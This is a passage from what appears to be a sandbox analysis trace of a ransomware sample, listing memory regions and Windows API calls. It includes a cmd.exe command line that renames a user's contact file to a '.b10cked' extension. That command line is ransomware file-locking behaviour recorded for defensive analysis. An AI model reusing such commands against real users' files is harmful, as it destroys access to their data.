"private_0x000000007ffdf000" filename = "" Region: id = 32840 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32841 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32842 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 32843 start_va = 0x160000 end_va = 0x1c6fff entry_point = 0x160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32844 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 32845 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32846 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32847 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32848 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32849 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32850 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32851 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32852 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32853 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32864 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 32865 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32866 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32867 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32868 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 32869 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 32870 start_va = 0x4d0000 end_va = 0x10cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 32871 start_va = 0x10d0000 end_va = 0x1232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 32872 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 32873 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 772 os_tid = 0xd24 [0219.516] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc9c | out: lpSystemTimeAsFileTime=0x2cfc9c*(dwLowDateTime=0xb7a372e0, dwHighDateTime=0x1d440a9)) [0219.516] GetCurrentProcessId () returned 0x694 [0219.516] GetCurrentThreadId () returned 0xd24 [0219.516] GetTickCount () returned 0x3d4bc [0219.516] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc94 | out: lpPerformanceCount=0x2cfc94*=27630545183) returned 1 [0219.517] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0219.517] __set_app_type (_Type=0x1) [0219.517] __p__fmode () returned 0x76b331f4 [0219.517] __p__commode () returned 0x76b331fc [0219.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0219.517] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0219.517] GetCurrentThreadId () returned 0xd24 [0219.517] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd24) returned 0x38 [0219.517] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.517] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0219.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfc2c | out: phkResult=0x2cfc2c*=0x0) returned 0x2 [0219.518] VirtualQuery (in: lpAddress=0x2cfc63, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfbfc, dwLength=0x1c | out: lpBuffer=0x2cfbfc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0219.518] GetConsoleOutputCP () returned 0x1b5 [0219.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.519] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.520] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0219.524] GetEnvironmentStringsW () returned 0x70180* [0219.524] FreeEnvironmentStringsW (penv=0x70180) returned 1 [0219.524] GetEnvironmentStringsW () returned 0x70180* [0219.524] FreeEnvironmentStringsW (penv=0x70180) returned 1 [0219.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb9c | out: phkResult=0x2ceb9c*=0x40) returned 0x0 [0219.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0xa8, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.524] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x0, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegCloseKey (hKey=0x40) returned 0x0 [0219.525] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb9c | out: phkResult=0x2ceb9c*=0x40) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x40, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x1, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x0, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x9, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x4, lpData=0x2ceba8*=0x9, lpcbData=0x2ceba0*=0x4) returned 0x0 [0219.525] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceba4, lpData=0x2ceba8, lpcbData=0x2ceba0*=0x1000 | out: lpType=0x2ceba4*=0x0, lpData=0x2ceba8*=0x9, lpcbData=0x2ceba0*=0x1000) returned 0x2 [0219.525] RegCloseKey (hKey=0x40) returned 0x0 [0219.525] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b5 [0219.525] srand (_Seed=0x5b8863b5) [0219.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"" [0219.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"" [0219.525] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.525] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x718e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0219.526] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0219.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.526] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.526] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0219.526] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0219.526] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0219.526] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0219.526] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0219.526] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0219.526] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0219.526] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0219.526] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0219.526] GetEnvironmentStringsW () returned 0x722d0* [0219.526] FreeEnvironmentStringsW (penv=0x722d0) returned 1 [0219.526] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.526] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.526] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0219.526] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0219.526] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0219.526] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0219.526] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0219.526] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0219.526] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0219.526] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0219.526] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf968 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.526] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf968, lpFilePart=0x2cf964 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf964*="Desktop") returned 0x18 [0219.527] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.527] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf6e4 | out: lpFindFileData=0x2cf6e4) returned 0x70010 [0219.527] FindClose (in: hFindFile=0x70010 | out: hFindFile=0x70010) returned 1 [0219.527] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf6e4 | out: lpFindFileData=0x2cf6e4) returned 0x70010 [0219.527] FindClose (in: hFindFile=0x70010 | out: hFindFile=0x70010) returned 1 [0219.527] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf6e4 | out: lpFindFileData=0x2cf6e4) returned 0x70010 [0219.527] FindClose (in: hFindFile=0x70010 | out: hFindFile=0x70010) returned 1 [0219.527] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.527] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0219.527] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0219.527] GetEnvironmentStringsW () returned 0x72af0* [0219.527] FreeEnvironmentStringsW (penv=0x72af0) returned 1 [0219.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.528] GetConsoleOutputCP () returned 0x1b5 [0219.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.528] GetUserDefaultLCID () returned 0x409 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfaa8, cchData=128 | out: lpLCData="0") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfaa8, cchData=128 | out: lpLCData="0") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfaa8, cchData=128 | out: lpLCData="1") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0219.530] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0219.530] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0219.531] GetConsoleTitleW (in: lpConsoleTitle=0x608e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.540] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0219.540] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0219.540] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0219.541] _wcsicmp (_String1="move", _String2=")") returned 68 [0219.541] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0219.541] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0219.541] _wcsicmp (_String1="IF", _String2="move") returned -4 [0219.541] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0219.541] _wcsicmp (_String1="REM", _String2="move") returned 5 [0219.541] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0219.543] GetConsoleTitleW (in: lpConsoleTitle=0x2cf7a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.551] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0219.551] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0219.551] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0219.551] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0219.551] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0219.551] _wcsicmp (_String1="move", _String2="CD") returned 10 [0219.551] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0219.551] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0219.551] _wcsicmp (_String1="move", _String2="REN") returned -5 [0219.551] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0219.551] _wcsicmp (_String1="move", _String2="SET") returned -6 [0219.551] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0219.551] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0219.551] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0219.551] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0219.552] _wcsicmp (_String1="move", _String2="MD") returned 11 [0219.552] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0219.552] _wcsicmp (_String1="move", _String2="RD") returned -5 [0219.552] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0219.552] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0219.552] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0219.552] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0219.552] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0219.552] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0219.552] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0219.552] _wcsicmp (_String1="move", _String2="VER") returned -9 [0219.552] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0219.552] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0219.552] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0219.552] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0219.552] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0219.552] _wcsicmp (_String1="move", _String2="START") returned -6 [0219.552] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0219.552] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0219.552] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0219.553] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.553] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.553] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf55c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf554, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf554*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.554] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.555] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2=".") returned 